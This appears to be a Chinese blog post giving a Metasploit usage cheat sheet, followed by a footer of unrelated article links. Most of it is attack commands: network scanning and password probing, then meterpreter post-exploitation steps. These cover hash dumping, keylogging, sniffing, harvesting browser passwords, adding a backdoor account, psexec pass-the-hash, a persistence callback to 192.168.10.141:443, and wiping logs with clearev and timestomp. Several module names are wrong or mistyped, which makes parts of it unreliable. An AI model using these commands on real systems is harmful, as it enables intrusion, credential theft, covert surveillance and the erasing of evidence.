信息收集阶段

Whois信息收集

msf auxiliary > whois baidu.com

域名信息查询阶段

msf auxiliary > nslookup www.baidu.com

msf auxiliary > dig @114.114.114.114 www.baidu.com



主机端口探测阶段

直接使用PING命令探测连通性

ping 1.2.3.4

msf > use auxiliary/scanner/discovery/arp_sweep

msf > set RHOSTS 1.1.1.0/24

msf > set THREADS 50

msf > run

使用NMAP探测

msf > nmap command

服务扫描打点

telnet服务:use auxiliary/scanner/telnet/telnet_version

ssh服务:use auxiliary/scanner/ssh/telnet_version

Oracle服务:use auxiliary/scanner/oracle/tnslsnr_version

http服务:use auxiliary/scanner/http/open_proxy

口令探测

ssh服务:use auxiliary/scanner/ssh/telnet_login

ftp服务:use auxiliary/sniffer/psnuffle

漏洞扫描阶段

那是nessus openVAS等的天下,可以利用PostgreSQL数据库进行联动

MSF框架下的WEB渗透

为什么不用burpsuite呢,用burpsuite更好

还有SQLMAP啊,还有好多其他的啊,啦啦啦

漏洞利用阶段

选择合适的漏洞利用payload和攻击脚本即可

use xxx

set payload xxx

强大的meterpreter

meterpreter > background 后台运行meterpreter

meterpreter > sessions 列出session,选择交互session的话 使用session -i  x

msterpreter > shell

msterpreter > cat xxxxx 查看文件

msterpreter > getwd/getlwd  获取当下路径

msterpreter > upload xxx.exe c:\  上传文件或文件夹

msterpreter > download c:\\"Program Files"\\xxx\\xxx\\xxx  ./  下载文件

msterpreter > edit 使用vi编辑器编辑目标机上的文件

msterpreter > search 搜索目标上的文件

msterpreter > ipconfig 查看网络信息

msterpreter > portfwd add -l 1234 -p 3389 -r 1.2.3.4 将目标机的3389 转发到本地1234端口

msterpreter > route 查看目标机的路由信息

msterpreter > ps  查看进程表

msterpreter > migrate 转移shell到进程

msterpreter > execute -H -f cmd.exe 隐藏执行cmd

msterpreter > execute -H -i -f cmd.exe 可以与cmd交互了 -m 参数直接在内存执行供给端的可执行文件 execute -H -m -d xxx.exe -f xxx.exe -a "-o xxxx.txt"

msterpreter > getpid 获取当前会话所在进程的pid

msterpreter > getuid /whoami 获取自己是谁

msterpreter > sysinfo  查看系统信息

msterpreter > kill 杀掉进程

msterpreter > shutdown关机

msterpreter > hashdump 获取windows 的hash口令

msterpreter > run persistence -X -i 5 -p 443 -r 192.168.10.141

msterpreter > run metsvc #吧31337端口打开监听meterpreter

msterpreter > run getgui -u metaspolit -p meterpreter 添加账户metaspolit 密码meterpreter

msterpreter > run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up_xxxxxxxx.xxxx.rc

msterpreter > getsystem 提权

msterpreter > run post/windows/gather/dumplinks 获取最近处理的文档

msterpreter > run post/windows/gather/enum_applications 获取安装的程序

msterpreter > keyscan_start 键盘记录

msterpreter > keyscan_dump

msterpreter > keyscan_stop 关闭

msterpreter > use sniffer #网络监听获取密码

msterpreter > sniffer_interface

msterpreter > sniffer_start 1

msterpreter > sniffer_dump 1 /tmp/xxx.pcap

msterpreter > sniffer_stop 1

msterpreter > run post/windows/gather/enum_ie 浏览器获取密码

msterpreter > run windows/gather/smart_hashdump 获取系统口令

msterpreter > run get_local_subnets 添加路由

msterpreter > background 后 route add a.b.c.d x.x.x.x 1 然后查看route print

msf > use exploit/windows/smb/psexec

msf > set RHOST RPORT LHOST ...

msf > set SMBPass hash值

msf > exploit

msterpreter > clearev 删除日志

msterpreter >timestomp 停止修改文件属性的时间记录

Metaspolit使用简介的更多相关文章

  1. 关于metaspolit中进行JAVA反序列化渗透RMI的原理分析

    一.背景: 这里需要对java反序列化有点了解,在这里得推广下自己的博客嘛,虽然写的不好,广告还是要做的.原谅我: 1.java反序列化漏洞原理研习 2.java反序列化漏洞的检测 二.攻击手法简介 ...

  2. ASP.NET Core 1.1 简介

    ASP.NET Core 1.1 于2016年11月16日发布.这个版本包括许多伟大的新功能以及许多错误修复和一般的增强.这个版本包含了多个新的中间件组件.针对Windows的WebListener服 ...

  3. MVVM模式和在WPF中的实现(一)MVVM模式简介

    MVVM模式解析和在WPF中的实现(一) MVVM模式简介 系列目录: MVVM模式解析和在WPF中的实现(一)MVVM模式简介 MVVM模式解析和在WPF中的实现(二)数据绑定 MVVM模式解析和在 ...

  4. Cassandra简介

    在前面的一篇文章<图形数据库Neo4J简介>中,我们介绍了一种非常流行的图形数据库Neo4J的使用方法.而在本文中,我们将对另外一种类型的NoSQL数据库——Cassandra进行简单地介 ...

  5. REST简介

    一说到REST,我想大家的第一反应就是“啊,就是那种前后台通信方式.”但是在要求详细讲述它所提出的各个约束,以及如何开始搭建REST服务时,却很少有人能够清晰地说出它到底是什么,需要遵守什么样的准则. ...

  6. Microservice架构模式简介

    在2014年,Sam Newman,Martin Fowler在ThoughtWorks的一位同事,出版了一本新书<Building Microservices>.该书描述了如何按照Mic ...

  7. const,static,extern 简介

    const,static,extern 简介 一.const与宏的区别: const简介:之前常用的字符串常量,一般是抽成宏,但是苹果不推荐我们抽成宏,推荐我们使用const常量. 执行时刻:宏是预编 ...

  8. HTTPS简介

    一.简单总结 1.HTTPS概念总结 HTTPS 就是对HTTP进行了TLS或SSL加密. 应用层的HTTP协议通过传输层的TCP协议来传输,HTTPS 在 HTTP和 TCP中间加了一层TLS/SS ...

  9. 【Machine Learning】机器学习及其基础概念简介

    机器学习及其基础概念简介 作者:白宁超 2016年12月23日21:24:51 摘要:随着机器学习和深度学习的热潮,各种图书层出不穷.然而多数是基础理论知识介绍,缺乏实现的深入理解.本系列文章是作者结 ...

随机推荐

  1. fedora arm-linux-gcc4.4.3编译u-boot-2010.3

    Mini2440开发板,samsungS3C2440芯片 构建u-boot 两个包: arm-linux-gcc4.4.3 u-boot-2010.3 fedora 不支持32位库,编译出现错误: / ...

  2. TXT文件用法大全【荐】--------按键精灵

    来源:全文链接 (3)读取TXT文件指定某一行的第?到第?个字 UserVar t=2 "读出txt第几行文本" UserVar i=5 "从第几个字开始读取" ...

  3. ★Wireshark基本介绍和学习TCP三次握手

    之前写过一篇博客:用 Fiddler 来调试HTTP,HTTPS. 这篇文章介绍另一个好用的抓包工具wireshark, 用来获取网络数据封包,包括http,TCP,UDP,等网络协议包. 记得大学的 ...

  4. [转帖]CentOS下iRedMail安装配置

    CentOS下iRedMail安装配置 中文名为艾瑞得邮件,由 rhms 项目更名而来.是针对 Linux 设计的邮件服务器解决方案,是在操作系统安装好后使用的一套 shell 脚本,用于快速部署一套 ...

  5. 【Postgresql】use

    http://www.jianshu.com/p/0ed65e630fd0 http://www.linuxidc.com/Linux/2013-12/94354.htm tag 是一个Array字段 ...

  6. Java正则表达式的使用和详解(上)

    1.匹配验证-验证Email是否正确 public static void main(String[] args) { // 要验证的字符串 String str = "service@xs ...

  7. python中注释的写法

    说明: 记录在python中注释的写法. 1.单行注释,代码行以 # 开头 # 这是一个单行注释 print('hello world') 2.多行注释,使用三个单引号,或者三个双引号将其要注释的内容 ...

  8. aspose导出excel文件

    using Aspose.Cells; using System; using System.Collections.Generic; using System.Data; using System. ...

  9. 项目管理PMP输入输出ITTO联系记忆

    综述九大领域 项目管理的输入输出非常难记,原因在于理解起来也经不去推敲,故整理一个联想记忆版本,通过联想把输入输出都串起来达到记忆的目的,既然是联想,里面的内容逻辑只是为了好记,并无正确与否,请大家原 ...

  10. SpringMVC由浅入深day02_1课程安排_2包装类型pojo参数绑定_3集合类型绑定

    springmvc第二天 高级知识 复习: springmvc框架: DispatcherServlet前端控制器:接收request,进行response HandlerMapping处理器映射器: ...